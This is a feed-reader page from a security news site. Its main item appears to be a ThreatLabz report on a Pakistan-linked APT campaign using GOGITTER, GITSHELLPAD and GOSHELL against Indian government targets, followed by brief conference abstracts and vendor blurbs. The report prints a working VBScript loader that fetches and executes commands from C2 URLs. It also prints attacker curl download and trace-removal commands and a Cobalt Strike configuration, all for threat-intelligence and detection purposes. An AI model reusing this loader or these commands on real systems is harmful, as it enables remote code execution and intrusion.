Reading view

There are new articles available, click to refresh the page.

APT Attacks Target Indian Government Using GOGITTER, GITSHELLPAD, and GOSHELL | Part 1

✇Security Boulevard
By: Sudeep Singh (Sr. Manager, APT Research)

IntroductionIn September 2025, Zscaler ThreatLabz identified two campaigns, tracked as Gopher Strike and Sheet Attack, by a threat actor that operates in Pakistan and primarily targets entities in the Indian government. In both campaigns, ThreatLabz identified previously undocumented tools, techniques, and procedures (TTPs). While these campaigns share some similarities with the Pakistan-linked Advanced Persistent Threat (APT) group, APT36, we assess with medium confidence that the activity identified during this analysis might originate from a new subgroup or another Pakistan-linked group operating in parallel.This blog post is the first in a two-part series that covers the Gopher Strike campaign, including the newly discovered GOGITTER tool as an initial downloader, a backdoor called GITSHELLPAD for command-and-control (C2) communication, and GOSHELL, a Golang shellcode loader used to deploy a Cobalt Strike Beacon. The second part of the blog will explore the Sheet Attack campaign, including the attack chain, backdoors, and the use of generative AI in malware development.Key TakeawaysIn September 2025, ThreatLabz identified two new campaigns by a Pakistan-linked APT group targeting the Indian government. Based on their TTPs, we named the two campaigns Gopher Strike and Sheet Attack.The Gopher Strike campaign uses PDFs containing malicious links and fake prompts to trick victims into downloading an ISO file with a payload, ensuring delivery is restricted to targeted victims (Windows systems in India).GOGITTER is a new downloader written in Golang that fetches payloads from a threat actor-controlled private GitHub repository.GITSHELLPAD is a new lightweight backdoor written in Golang that leverages private GitHub repositories for C2 communication.GOSHELL is a shellcode loader written in Golang that deploys Cobalt Strike on specific hostnames that have been hardcoded into the malware. ThreatLabz assesses with medium confidence that these campaigns likely originate from a new subgroup or a parallel Pakistan-linked group, despite sharing similarities with the APT36 threat group.Technical AnalysisIn the following sections, ThreatLabz discusses the technical details of the Gopher Strike campaign, including how the GOGITTER downloader functions, the role of the GITSHELLPAD backdoor for C2 communication, and the deployment of a Cobalt Strike Beacon using GOSHELL.Gopher Strike campaign attack flowThe figure below shows the attack flow that leads to the deployment of Cobalt Strike.Figure 1: Shows how the Gopher Strike campaign leads to the deployment of Cobalt Strike.Initial infection vectorThreatLabz traced the origins of the Gopher Striker campaign to multiple PDFs presumably sent in spear phishing emails. These PDFs contain a malicious link and a blurred image of legitimate documents that would be of interest to the victim. The image is designed to trick victims into downloading a fake Adobe Acrobat update to access the document's contents. The dialog is presented as a button labeled Download and Install, as shown in the figure below.Figure 2: Example of a PDF file used in the Gopher Strike campaign.If the victim clicks the button, an ISO file containing the malicious payload is downloaded. During analysis, ThreatLabz observed that the servers hosting the payload only respond with the ISO file when accessed from IP addresses in India, with a User-Agent header representing a Windows platform. These server-side checks prevent automated URL analysis tools from fetching the ISO file, ensuring that the malicious file is only delivered to intended targets.GOGITTER downloaderGOGITTER is a previously undocumented lightweight 64-bit Golang-based downloader. The following sections outline the key functionalities of the downloader.GOGITTER sequentially checks for the existence of the VBScript file windows_api.vbs in the following locations:C:\Users\Public\DownloadsC:\Users\Public\Pictures%APPDATA%If the VBScript is not found in any of the locations above, GOGITTER attempts to create a new file named windows_api.vbs in the first accessible location. The contents of this VBScript are stored in plaintext within the binary.The contents of the VBScript file windows_api.vbs are included below.Dim objHTTP, lastresponse, name, primaryURL, fallbackURL
Set objHTTP = CreateObject("MSXML2.ServerXMLHTTP")
name = CreateObject("WScript.Network").ComputerName
primaryURL = "hxxps[:]//govt-filesharing[.]site/hpc5985.php?key=xvnd54&info=Hello" & name
fallbackURL = "hxxp[:]//ingov.myartsonline[.]com/hpc5985.php?key=xvnd54&info=Hello" & name
lastresponse = ""
Function GetResponse(url)
On Error Resume Next
objHTTP.Open "GET", url, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
objHTTP.setRequestHeader "Accept-Charset", "UTF-8"
objHTTP.setRequestHeader "Accept-Language", "en-US,en;q=0.5"
objHTTP.Send
If objHTTP.Status = 200 Then
GetResponse = objHTTP.responseText
Else
GetResponse = ""
End If
On Error GoTo 0
End Function
Do
responsebody = GetResponse(primaryURL)
If responsebody = "" Then responsebody = GetResponse(fallbackURL)
If responsebody "" And responsebody lastresponse Then
If Left(responsebody, 3) = "hi " Then
Execute Mid(responsebody, 4)
lastresponse = responsebody
End If
End If
WScript.Sleep 30000
LoopThis newly-created VBScript contains two pre-configured C2 URLs that are used to fetch VBScript commands every 30 seconds. The VBScript connects to the primary URL with a hardcoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 and two more pre-configured HTTP headers.If the response from the C2 server begins with the string hi, the remaining response strings are treated as VBScript commands and executed.If the response from the primary URL is empty, the script retrieves the secondary URL.To achieve persistence, a scheduled task is created with a dynamic name (MicrosoftEdge_ConfigurationUpdate_<__random__>) where a random four digit number is generated at runtime. This task is configured to execute the dropped windows_api.vbs script every 50 minutes.GOGITTER checks for the presence of the ZIP archive adobe_update.zip in the aforementioned locations in the same manner. If the file is not present, GOGITTER downloads a file named adobe_update.zip from the private threat actor-controlled GitHub repository at hxxps[:]//raw.githubusercontent[.]com/jaishankai/sockv6/main/adobe_update.zip. A GitHub authentication token embedded in the binary is used to authenticate and download the archive from the private repository. The contents of adobe_update.zip are extracted to one of the three installation folder locations, dropping the executable edgehost.exe and a zero byte text document.GOGITTER then sends an HTTP GET request to the URL adobe-acrobat[.]in/ninevmc987.php?file=bncoeeav34564cvv94adfavc3354334dfsf, most likely to signal that the endpoint has been successfully infected.GITSHELLPAD backdoorThe edgehost.exe file is GITSHELLPAD, a 64-bit lightweight Golang-based backdoor that leverages threat actor-controlled private GitHub repositories for its C2 communication. The backdoor registers the victim with the C2 server, and polls the C2 for commands to execute. GITSHELLPAD uses GitHub’s REST API to create a new directory in the threat actor-controlled GitHub repository with the format: SYSTEM-. GITSHELLPAD then adds the file info.txt into this new directory and commits the changes to the main branch. The info.txt file contains the Base64-encoded string: PC Name: SYSTEM-. GITSHELLPAD polls the threat actor-controlled GitHub account for new commands every 15 seconds by sending a GET request to the GitHub REST Contents API endpoint for the file command.txt. If GITSHELLPAD is unable to connect to GitHub to fetch command.txt, it retries every 8 seconds. If the contents of command.txt are empty, then GITSHELLPAD retries to fetch the content after 7 seconds.Once the command.txt file is successfully fetched, its contents are Base64-decoded to retrieve the command string. The table below shows the commands supported by GITSHELLPAD.CommandDescriptioncd ..Change working directory to parent directory.cd Change directory to the specified path.run Run command in the background but don't capture the output.upload Upload the local file specified by the path to the GitHub repo.download Download a file to the specified path.Default caseExecute the command using cmd /c and capture the output.Table 1: Commands supported by GITSHELLPAD.All the logging messages detailing the command status and output are captured in the result.txt file and uploaded to the threat actor's GitHub account via a PUT request. The command.txt file is deleted from the threat actor-controlled GitHub repository after successful command execution on the endpoint.During the investigation, ThreatLabz discovered four threat actor-controlled private GitHub repositories and observed more than 200 post-compromise commands issued by the threat actor. The table below lists a subset of the post-compromise commands observed by ThreatLabz.CategoryDescriptionSample CommandsUser reconnaissanceCollects information about the user.net userwhoamiSystem and network reconnaissanceCollects information about the system and network configuration.systeminfoarp -acurl ifconfig.me/ipwmic logicaldisk get nameNetwork connectivity checkChecks connectivity to the C2 server.curl -I https://adobe-acrobat[.]inDownload post-compromise toolsDownloads an archive to the victim’s filesystem.curl -L -o a.rar hxxps[:]//adobe-acrobat[.]in/a.rarClear filesystem tracesDeletes filesystem artifacts.del /f /q svchost.rarClear running process tracesKills GITSHELLPAD related processes.tasklist | findstr CLEANUPtaskkill /F /PID 10572Archive extractionExtracts the contents of a downloaded archive.tar -xvf svchost.rarTable 2: A list of commands issued by the threat actor during the attack campaign. These commands are executed using the GITSHELLPAD payload.A complete list of post-compromise commands are available in the ThreatLabz GitHub repository.GOSHELL loaderAfter the threat actor gained access to the victim’s machine, ThreatLabz observed them downloading RAR archives containing post-compromise tools. The threat actors used the cURL commands shown in the table above to perform these downloads. The archives included tools that collect information from the compromised system. The threat actor also utilized GOSHELL, a custom-built Golang-based loader, to deploy a Cobalt Strike Beacon. Once the RAR archives were downloaded, they were extracted using the tar utility, and the tools were deleted after use. In this analysis, we focus only on the primary backdoor that was deployed.GOSHELL’s size was artificially inflated to approximately 1 gigabyte by adding junk bytes to the Portable Executable (PE) overlay, likely to evade detection by antivirus software. These junk bytes were not entirely random but consisted of repeated byte sequences, such as:Null bytesSECURITY123456COMPRESSME!{AB CD EF 90 90 41 42 43 44 45 CC DE AD BE EF 00 FF 11 22 33}GOSHELL undergoes multiple decoding stages before eventually loading Cobalt Strike Beacon.GOSHELL only executes on specific hostnames by comparing the victim's hostname against a hardcoded list. If no match is found, GOSHELL exits.If a match is found, GOSHELL proceeds to decode the embedded second-stage shellcode. GOSHELL will:HEX-decode an embedded string and XOR the resulting bytes with 0xAA.Sleep for a random interval between three and seven seconds.Execute the second-stage shellcode within the same process using QueueUserAPC.This 32-bit second-stage shellcode is executed by the QueueUserAPC call. It performs another layer of decoding. The main purpose of the second-stage shellcode is to decrypt and load the next-stage Cobalt Strike payload. Below are its key functionalities.Allocates executable memory.Parses the PE header to extract the 4-byte XOR key 0x51211104.Copies the next-stage encrypted shellcode to executable memory.Decrypts the encrypted shellcode using the 4-byte XOR key.Invokes the entry point of the next-stage shellcode.Stage 3 is the final decoded payload, a stageless Cobalt Strike Beacon. ThreatLabz extracted the configuration, which appears to have been modified from a public profile.The Cobalt Strike configuration is shown below.BeaconType - HTTPS
Port - 443
SleepTime - 45000
MaxGetSize - 2801745
Jitter - 30
MaxDNS - Not Found
PublicKey_MD5 - 2e4e4ea817ad2286616f809ca84fc932
C2Server - d18c3nlvb0n2a6.cloudfront.net,/jquery-3.3.1.min.js
UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
HttpPostUri - /jquery-3.3.2.min.js
Malleable_C2_Instructions - Remove 1522 bytes from the end
Remove 84 bytes from the beginning
Remove 3931 bytes from the beginning
Base64 URL-safe decode
XOR mask w/ random key
HttpGet_Metadata - ConstHeaders
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Metadata
base64url
prepend "__cfduid="
header "Cookie"
HttpPost_Metadata - ConstHeaders
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
SessionId
mask
base64url
parameter "__cfduid"
Output
mask
base64url
print
PipeName - Not Found
DNS_Idle - Not Found
DNS_Sleep - Not Found
SSH_Host - Not Found
SSH_Port - Not Found
SSH_Username - Not Found
SSH_Password_Plaintext - Not Found
SSH_Password_Pubkey - Not Found
SSH_Banner -
HttpGet_Verb - GET
HttpPost_Verb - POST
HttpPostChunk - 0
Spawnto_x86 - %windir%\syswow64\dllhost.exe
Spawnto_x64 - %windir%\sysnative\dllhost.exe
CryptoScheme - 0
Proxy_Config - Not Found
Proxy_User - Not Found
Proxy_Password - Not Found
Proxy_Behavior - Use IE settings
Watermark_Hash - NtZOV6JzDr9QkEnX6bobPg==
Watermark - 987654321
bStageCleanup - True
bCFGCaution - False
KillDate - 0
bProcInject_StartRWX - False
bProcInject_UseRWX - False
bProcInject_MinAllocSize - 17500
ProcInject_PrependAppend_x86 - b'\x90\x90'
Empty
ProcInject_PrependAppend_x64 - b'\x90\x90'
Empty
ProcInject_Execute - ntdll:RtlUserThreadStart
CreateThread
NtQueueApcThread-s
CreateRemoteThread
RtlCreateUserThread
ProcInject_AllocationMethod - NtMapViewOfSection
bUsesCookies - True
HostHeader -
headersToRemove - Not Found
DNS_Beaconing - Not Found
DNS_get_TypeA - Not Found
DNS_get_TypeAAAA - Not Found
DNS_get_TypeTXT - Not Found
DNS_put_metadata - Not Found
DNS_put_output - Not Found
DNS_resolver - Not Found
DNS_strategy - round-robin
DNS_strategy_rotate_seconds - -1
DNS_strategy_fail_x - -1
DNS_strategy_fail_seconds - -1
Retry_Max_Attempts - 0
Retry_Increase_Attempts - 0
Retry_Duration - 0
To Be ContinuedPart 1 explored the Gopher Strike campaign, which targeted Indian government entities using private GitHub repositories for C2. It introduced the Golang-based downloader GOGITTER, the backdoor GITSHELLPAD, and GOSHELL, a shellcode loader used to execute a Cobalt Strike Beacon.In Part 2, ThreatLabz will explore the Sheet Attack campaign, which leveraged legitimate services like Google Sheets, Firebase, and email for C2. We’ll analyze the attack chain, backdoors, and the use of generative AI in malware development.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to GOGITTER at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for GOGITTER.Figure 3: Zscaler Cloud Sandbox report for GOGITTER.In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to the targeted attacks mentioned in this blog at various levels with the following threat names:Win64.Backdoor.GITSHELLPADWin64.Downloader.GOGITTERWin64.Backdoor.GOSHELLIndicators Of Compromise (IOCs)File indicatorsHashesFilenameDescriptionb531b8d72561cb5c88d97986e450bbaeccd0228e9c1bdb4c355d67c98a3233bb1fa085ac3f2a52ec2dd2d6614115687325f1da9e028937f8a16bccc347de8c71c3aa87e1Operational_Information_Advisory_June2025.pdf Phishing PDF8577f613b3aec5c1c90118b15eea8756667785fdde357ae65a6668545c6c013190dc936899c3e908277df232d7170e1ea0697f79047c7f5610524bd11dc571fe4d84696bCircular_on_Updated_Allowances_TA_DA_PCCA_MHA.pdfPhishing PDFc876a70380738236ee28aab60a2cde6e0041636465cad79518a06d528e76393f442bf49523327fe1158c2e1229dfac028c461eb331686e5c5c04f33af7a042676806a962PCCA_Allowances_Revision_Circular.pdf Phishing PDF9b9c574cdb17c238df80414476228a784c33100babea20749ff0957f50b174046bc6489d03edba9908a2f9e1012237d216e894029bd58f9121027e35f80d7b701d30ca95TA_DA_Revised_Procedures_MEA.pdf Phishing PDFf2a71b2719744765ac8a6a49b2acbce6699329d64308a172c6cf7f83712215490fc0b6047434a71a8302462d56fee876c74cf3595cba9f2ca6940b3a11ece8aa064fcbaaInvite Capt (IN) Sandip Kapoor Presedent AFWHO.pdfPhishing PDF0d86b8039cffc384856e17912f3086166a11c0e5f1d1e22e89b4921c7a371dbf9cf547098f495603be80b513820a948d51723b616fac33f0f382fa4a141e39e12fff40cfedgehost.exeGITSHELLPADf454e2724a63cbbfda26daff1d8bb6106036098059fa1311866ce6ad2723c4d0d1f001386c60e5b28e352375d101eb0954fa98d229de3b94f22d5815af8948ebed1f44ddedgehost.exeGITSHELLPAD10a7725f807056cb0383a1cae38d49b454bfe1ffba8bff3571093ade5038dc98ef5f46ceaf01c12019a3a3aa64e8a99d7231e0f2af6084298733bba3d7d41db13091cbacedgehost.exeGITSHELLPADe26b3fece2fe296654406ef8045ffda16d1dbd92f7ed7381c7bfca681c3139daeab692f15d9b2e61ed45b6407b778a18ff87792265fa068d7c4580ae54fbf88af435679fedgehost.exeGITSHELLPADf4813d65cd7246f716fcbd8f7fd3e63d3d48ab9567c6080471459b34dfc12c89418be8a295a2fb8b6c7b74a7f598819810ddb0a505f3d5cf392b857ff8e75c5a1401110eedgehost.exeGITSHELLPADf2284f62625f117c57384b1c5b8b8f583c17dbf975af8eb7a67e6908f522c93c2c0662e5fff79ce90b1af67e0b6d16a850e85861c948f988eda39ef46457241bbe3df170edgehost.exeGITSHELLPADNetwork indicatorsTypeIndicatorC2 URLhxxps://adobe-acrobat[.]in/ninevmc987.php?file=bncoeeav34564cvv94adfavc3354334dfsfC2 URLhxxp://workspace1.myartsonline[.]com/hpc5985.php?key=xvnd54&info=HelloC2 URLhttp://ingov.myartsonline[.]com/hpc5985.php?key=xvnd54&info=HelloC2 URLhttps://govt-filesharing[.]site/hpc5985.php?key=xvnd54&info=HelloDownload URL, GOGITTER payloadhttps://d2i8rh3pkr4ltc.cloudfront[.]net/adobe_installation.php?file=Adobe_Acrobat_Reader_Installation_SetupDownload URL, GOGITTER payloadhttps://adobereader-upgrade[.]in/adobe_update.php?file=Adobe_Acrobat_Reader_InstallationDownload URL, GOGITTER payloadhttps://adobecloud[.]site/adobe_installer.php?file=Adobe_Acrobat_InstallerDownload URL, GOGITTER payloadhttps://adobe-acrobat[.]in/adobe_reader_setup.php?file=Adobe_Acrobat_Reader_Installation_SetupPayload hosting domainadobereader-update[.]inC2 domainlistsoft-update[.]siteC2 domainworkspace1.myartsonline[.]comC2 domainingov.myartsonline[.]comC2 domaingovt-filesharing[.]sitePayload hosting domainadobereader-upgrade[.]inPayload hosting domainadobecloud[.]sitePayload hosting domainadobe-acrobat[.]in MITRE ATT&CK FrameworkIDTactic, TechniqueDescriptionT1583.001Resource Development, Acquire Infrastructure: Domainsgovt-filesharing[.]site and ingov.myartsonline[.]com were acquired for C2 communication.T1583.006Resource Development, Acquire Infrastructure: Web ServicesThe threat actor used private GitHub repositories as a C2 channel and to host the second-stage payload adobe_update.zip.T1585.003Resource Development, Establish Accounts: Cloud AccountsThe threat actor created GitHub accounts to host private repositories for C2 communication and payload staging.T1587.001Resource Development, Develop Capabilities: MalwareThe threat actor developed custom malware such as the GOGITTER downloader and GITSHELLPAD.T1588.002Resource Development, Obtain Capabilities: ToolThe threat actor obtained and used a leaked version of Cobalt Strike.T1608.001Resource Development, Stage Capabilities: Upload MalwareThe threat actor staged malware by uploading the adobe_update.zip archive to a private GitHub repository.T1566.002Initial Access, Phishing: Spearphishing LinkThe threat actor used phishing PDFs which contained a lure with a ‘Download and Install’ button, linking to a malicious ISO file.T1059.003Execution, Command and Scripting Interpreter: Windows Command ShellGITSHELLPAD executed commands such as net user, systeminfo, and taskkill using a command shell.T1059.005Execution, Command and Scripting Interpreter: Visual BasicThe GOGITTER downloader dropped a VBScript file, windows_api.vbs, and created a scheduled task to execute it. This script then fetched and ran additional VBScript commands from a C2 server using the Execute function.T1106Execution, Native APIThe GOSHELL shellcode loader used the QueueUserAPC native API call to execute the second-stage shellcode within its own process.T1053.005Persistence, Scheduled Task/Job: Scheduled TaskThe GOGITTER downloader created a scheduled task to execute a dropped VBScript every 50 minutes for persistence. T1140Defense Evasion, Deobfuscate/Decode Files or InformationThe Cobalt Strike Beacon loader decodes the second-stage shellcode and the Beacon payload using HEX-decoding and XOR operations.T1036.004Defense Evasion, Masquerading: Masquerade Task or ServiceThe GOGITTER downloader creates a scheduled task, MicrosoftEdge_ConfigurationUpdate_<__random__>, to mimic a legitimate Microsoft Edge update task for persistence.T1036.005Defense Evasion, Masquerading: Match Legitimate Resource Name or LocationThe malware drops files with names intended to appear legitimate, such as windows_api.vbs, adobe_update.zip, and edgehost.exe.T1055.004Defense Evasion, Process Injection: Asynchronous Procedure CallThe GOSHELL shellcode loader executed a second-stage shellcode within its own process using the QueueUserAPC API call.T1070.004Defense Evasion, Indicator Removal: File DeletionThe threat actor executed the command del /f /q svchost.rar to delete downloaded archive files.T1480.001Execution Guardrails: Environmental KeyingThe GOSHELL shellcode loader was designed to execute only on specific hostnames by comparing the victim's hostname against a hardcoded list.T1027.001Defense Evasion, Obfuscated Files or Information: Binary PaddingThe threat actor used the GOSHELL shellcode loader that was inflated to approximately 1 gigabyte in size by adding junk bytes.T1027.009Defense Evasion, Obfuscated Files or Information: Embedded PayloadsThe GOGITTER downloader binary contained embedded payloads such as the windows_api.vbs. The GOSHELL shellcode loader contained an embedded second-stage shellcode as well as Cobalt Strike Beacon.T1027.013Defense Evasion, Obfuscated Files or Information: Encrypted/Encoded FileThe Cobalt Strike payload was obfuscated using a 4-byte XOR key (0x51211104).  T1027.015Defense Evasion, Obfuscated Files or Information: CompressionThe second-stage payload was delivered as a ZIP archive named from a private GitHub repository. Post-compromise tools were also downloaded in RAR archives.T1553.005Defense Evasion, Subvert Trust Controls: Mark-of-the-Web BypassThe malicious payload was distributed as an ISO file, a known method of bypassing  Mark-of-the-Web Bypass (MOTW) controls.T1033Discovery, System Owner/User DiscoveryThe threat actor executed the whoami command as part of post-compromise user reconnaissance activities.T1082Discovery, System Information DiscoveryThe threat actor executed post-compromise commands such as systeminfo and wmic logicaldisk get name to gather detailed information about the system.T1016Discovery, System Network Configuration DiscoveryThe threat actor executed the command arp -a and curl ifconfig.me/ip to discover the victim’s network configurations.T1016.001Discovery, System Network Configuration Discovery: Internet Connection DiscoveryThe threat actor executed the command curl -I https://adobe-acrobat.in to check for an internet connection to their C2 server.T1087.001Discovery, Account Discovery: Local AccountThe threat actor executed the net user command to enumerate local accounts.T1057Discovery, Process DiscoveryThe threat actor executed the command tasklist to gather information on active processes.T1018Discovery, Remote System DiscoveryThe threat actor executed the arp -a command to discover other systems on the local network.T1560.003Collection, Archive Collected Data: Archive via Custom MethodThe Cobalt Strike Beacon used was configured to encrypt its C2 output using a XOR mask.T1071.001Command and Control, Application Layer Protocol: Web ProtocolsThe malicious VBScript fetched commands via HTTP, and the Cobalt Strike Beacon used HTTPS for C2.T1102.002Command and Control, Web Service: Bidirectional CommunicationGITSHELLPAD uses a private GitHub repository as a bidirectional C2 channel.T1573.001Command and Control, Encrypted Channel: Symmetric CryptographyThe Cobalt Strike Beacon was configured to use XOR to encrypt its C2 communications.T1573.002Command and Control, Encrypted Channel: Asymmetric CryptographyThe Cobalt Strike Beacon used HTTPS for its C2 channel.T1132.001Command and Control, Data Encoding: Standard EncodingGITSHELLPAD Base64-encoded the victim's system information before writing it to the info.txt file in the private GitHub C2 repository. The Cobalt Strike Beacon was configured to use Base64 for its C2 communication.T1105Command and Control, Ingress Tool TransferAfter the initial compromise, the threat actor used curl to download post-compromise tools onto the victim's machine.T1665Command and Control, Hide InfrastructureThe server hosting the malicious payloads only responds to requests originating from IP addresses in India who have a User-Agent header indicating a Windows platform.T1008Command and Control, Fallback ChannelsThe windows_api.vbs script was configured with both a primary and a backup C2 URL. T1567.001Exfiltration, Exfiltration Over Web Service: Exfiltration to Code RepositoryGITSHELLPAD exfiltrated files to a private, threat actor-controlled GitHub repository.

The post APT Attacks Target Indian Government Using GOGITTER, GITSHELLPAD, and GOSHELL | Part 1 appeared first on Security Boulevard.

NDSS 2025 – ERW-Radar

✇Security Boulevard
By: Marc Handelman

Authors, Creators & Presenters: Lingbo Zhao (Institute of Information Engineering, Chinese Academy of Sciences), Yuhui Zhang (Institute of Information Engineering, Chinese Academy of Sciences), Zhilu Wang (Institute of Information Engineering, Chinese Academy of Sciences), Fengkai Yuan (Institute of Information Engineering, CAS), Rui Hou (Institute of Information Engineering, Chinese Academy of Sciences)

PAPER
ERW-Radar: An Adaptive Detection System against Evasive Ransomware by Contextual Behavior Detection and Fine-grained Content Analysis

To evade existing antivirus software and detection systems, ransomware authors tend to obscure behavior differences with benign programs by imitating them or by weakening malicious behaviors during encryption. Existing defense solutions have limited effects on defending against evasive ransomware. Fortunately, through extensive observation, we find I/O behaviors of evasive ransomware exhibit a unique repetitiveness during encryption. This is rarely observed in benign programs. Besides, the $chi^2$ test and the probability distribution of byte streams can effectively distinguish encrypted files from benignly modified files. Inspired by these, we first propose ERW-Radar, a detection system, to detect evasive ransomware accurately and efficiently. We make three breakthroughs: 1) a contextual correlation mechanism to detect malicious behaviors; 2) a fine-grained content analysis mechanism to identify encrypted files; and 3) adaptive mechanisms to achieve a better trade-off between accuracy and efficiency. Experiments show that ERW-Radar detects evasive ransomware with an accuracy of 96.18% while maintaining a FPR of 5.36%. The average overhead of ERW-Radar is 5.09% in CPU utilization and 3.80% in memory utilization.

ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post NDSS 2025 – ERW-Radar appeared first on Security Boulevard.

Secure, Reliable Terraform At Scale With Sonatype Nexus Repository

✇Security Boulevard
By: Aaron Linskens

Terraform has become the de facto standard for infrastructure as code (IaC). From cloud-native startups to global enterprises, teams rely on Terraform to define, provision, and manage infrastructure with speed and consistency across cloud and on-prem environments.

The post Secure, Reliable Terraform At Scale With Sonatype Nexus Repository appeared first on Security Boulevard.

AirDrop Security in iOS 26.2: Time Limits, Codes & Privacy Best Practices

✇Security Boulevard
By: Tom Eston

In this episode, we explore the latest changes to AirDrop in iOS 26.2 and how they enhance privacy and security. Learn about the new 10-minute limitation on the ‘Everyone’ setting and the introduction of AirDrop codes for safer file sharing with non-contacts. We also discuss best practices for configuring your AirDrop settings to safeguard your […]

The post AirDrop Security in iOS 26.2: Time Limits, Codes & Privacy Best Practices appeared first on Shared Security Podcast.

The post AirDrop Security in iOS 26.2: Time Limits, Codes & Privacy Best Practices appeared first on Security Boulevard.

💾

The New ATO Playbook: Session Hijacking, MFA Bypass, and Credential Abuse Trends for 2026

✇Security Boulevard
By: Jason Wagner

Account takeover didn’t disappear — it evolved Account takeover (ATO) and credential abuse aren’t new.What’s changed is how attackers do it and why many traditional defenses no longer catch it early. Today’s ATO attacks don’t always start with: Instead, they increasingly rely on: The result: fewer alerts, more successful takeovers. This shift reflects a broader …

The post The New ATO Playbook: Session Hijacking, MFA Bypass, and Credential Abuse Trends for 2026 appeared first on Security Boulevard.

Can NHIs management fit within tight cybersecurity budgets?

✇Security Boulevard
By: Alison Mack

Why Are Non-Human Identities Crucial in Cybersecurity? Have you ever considered how machine identities, or Non-Human Identities (NHIs), fit into your cybersecurity strategy? Where breaches and data leaks can have catastrophic consequences, ensuring that your digital is secure is more important than ever. Managing NHIs, which are essentially machine identities consisting of secrets such as […]

The post Can NHIs management fit within tight cybersecurity budgets? appeared first on Entro.

The post Can NHIs management fit within tight cybersecurity budgets? appeared first on Security Boulevard.

How impenetrable are secrets vaults in modern cybersecurity?

✇Security Boulevard
By: Alison Mack

What Makes Secrets Vaults Impenetrable in Modern Cybersecurity? What elevates the strength of secrets vaults in cybersecurity? With technology continues to evolve, the bedrock of secure information exchange lies in how effectively we handle Non-Human Identities (NHIs) and secrets management within our systems. Understanding the Critical Nature of Non-Human Identities NHIs play a pivotal role. […]

The post How impenetrable are secrets vaults in modern cybersecurity? appeared first on Entro.

The post How impenetrable are secrets vaults in modern cybersecurity? appeared first on Security Boulevard.

Are cloud-native AIs free from legacy security issues?

✇Security Boulevard
By: Alison Mack

Can Non-Human Identities Bridge the Security Gap in Cloud Environments? Non-Human Identities (NHIs) are quickly becoming a critical component in bridging the security gap in cloud environments. These machine identities are created by combining secrets—encrypted passwords, tokens, or keys—with permissions granted by destination servers. This complex interaction, akin to a tourist navigating international borders with […]

The post Are cloud-native AIs free from legacy security issues? appeared first on Entro.

The post Are cloud-native AIs free from legacy security issues? appeared first on Security Boulevard.

What capabilities should AI have for advanced threat detection?

✇Security Boulevard
By: Alison Mack

How Secure Are Your Machine Identities in the Cloud Environment? Have you ever pondered the extent to which machine identities are secured within your organization’s cloud infrastructure? יקרק businesses increasingly migrate to cloud environments, the management of Non-Human Identities (NHIs) has become a crucial aspect of a comprehensive security strategy. Machine identities, which are often […]

The post What capabilities should AI have for advanced threat detection? appeared first on Entro.

The post What capabilities should AI have for advanced threat detection? appeared first on Security Boulevard.

NDSS 2025 – RContainer

✇Security Boulevard
By: Marc Handelman

Session 10A: Confidential Computing 2

Authors, Creators & Presenters: Qihang Zhou (Institute of Information Engineering, Chinese Academy of Sciences), Wenzhuo Cao (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyberspace Security, University of Chinese Academy of Sciences), Xiaoqi Jia (Institute of Information Engineering, Chinese Academy of Sciences), Peng Liu (The Pennsylvania State University, USA), Shengzhi Zhang (Department of Computer Science, Metropolitan College, Boston University, USA), Jiayun Chen (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyberspace Security, University of Chinese Academy of Sciences), Shaowen Xu (Institute of Information Engineering, Chinese Academy of Sciences; School of Cyberspace Security, University of Chinese Academy of Sciences), Zhenyu Song (Institute of Information Engineering, Chinese Academy of Science)

PAPER
RContainer: A Secure Container Architecture through Extending ARM CCA Hardware Primitives

Containers have become widely adopted in cloud platforms due to their efficient deployment and high resource utilization. However, their weak isolation has always posed a significant security concern. In this paper, we propose RContainer, a novel secure container architecture that protects containers from untrusted operating systems and enforces strong isolation among containers by extending ARM Confidential Computing Architecture (CCA) hardware primitives. RContainer introduces a small, trusted mini-OS that runs alongside the deprivileged OS, responsible for monitoring the control flow between the operating system and containers. Additionally, RContainer uses shim-style isolation, creating an isolated physical address space called con-shim for each container at the kernel layer through the Granule Protection Check mechanism. We have implemented RContainer on ARMv9-A Fixed Virtual Platform and ARMv8 hardware SoC for security analysis and performance evaluation. Experimental results demonstrate that RContainer can significantly enhance container security with a modest performance overhead and a minimal Trusted Computing Base (TCB).

ABOUT NDSS
The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSS Symposium 2025 Conference content on the Organizations' YouTube Channel.

Permalink

The post NDSS 2025 – RContainer appeared first on Security Boulevard.

❌